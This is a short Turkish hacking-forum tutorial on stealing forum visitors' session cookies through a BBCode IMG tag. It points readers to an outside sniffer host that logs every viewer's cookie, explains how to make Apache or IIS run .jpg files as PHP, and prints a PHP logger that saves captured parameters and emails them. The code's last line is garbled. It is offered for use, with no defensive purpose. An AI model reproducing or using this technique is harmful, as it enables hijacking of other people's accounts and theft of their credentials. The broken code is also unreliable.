Cyber-Warrior.Org \ Doküman \ Exploits / Vulnerabilities

BBCode kullanarak Cookie çalmak

Cookiler web sayfanizi ziyaret eden ziyaretçilere sonraki girislerinde tanimak için birakilan metin dosyalaridir.Bu dosyalardaki bilgiler XSS saldirilari ile çalinabilinir ve o siteye sizin kullanici adiniz ile cookie sayesinde oturum açabilirler.

Bazi portal ve forumlarda forumda [IMG][/IMG] kodu kullanilarakta cookie çalinabilmektedir.

Foruma mesaj atarken IMG tag i içine http://antichat.ru/cgi-bin/s.jpg bu resmi çagirirsaniz o konuya giren herkesin cookie bilgisi http://antichat.ru/sniff/log.php adresinde loglanicaktir.

Peki gelelim http://antichat.ru/cgi-bin/s.jpg nin nasil cookie çaldigina burda jpg içine kod filan ekledikleri yok.Yapilan çok basit birsey tabi bunu daha önce apache server veya IIS kurduysaniz anlarsiniz.

Serverinizda apache veya IIS kurulu ise yapmaniz gerekenler

Apache için

Apache kurdugunuz klasore girip ordan conf klasorune httpd isimli dosyayi açip AddType application/x-httpd-php3 .phtml .php3 .php satirini bularak sonuna .jpg eklemek.Burada php yi temsil edecek uzantilari seçiyorsunuz ve .jpg uzantisinida php emrine vermis oluyorsunuz

IIS de bu islemi

Baslat/çalistir/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize degerine tiklayin daha sonra yeni deger e çift tiklayip .jpg yazin iste IIS de de jpg uzantiyi php emrine vermis olduk.

Daha sonra yapmaniz gerekenler Yeni bir metin belgesi açip içine

Log.php kodlari:

<?php
$kayit = fopen("ekledik.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\\n");
}
fwrite($kayit,"---------------------------\\n");
fclose($kayit);
mail(" [email protected],Sifre Geldi çip çip ",": [email][email protected]’);[/email]
?>

Hepiniz selametle kalin insAllah yardimci olmusumdur

By Turmanbay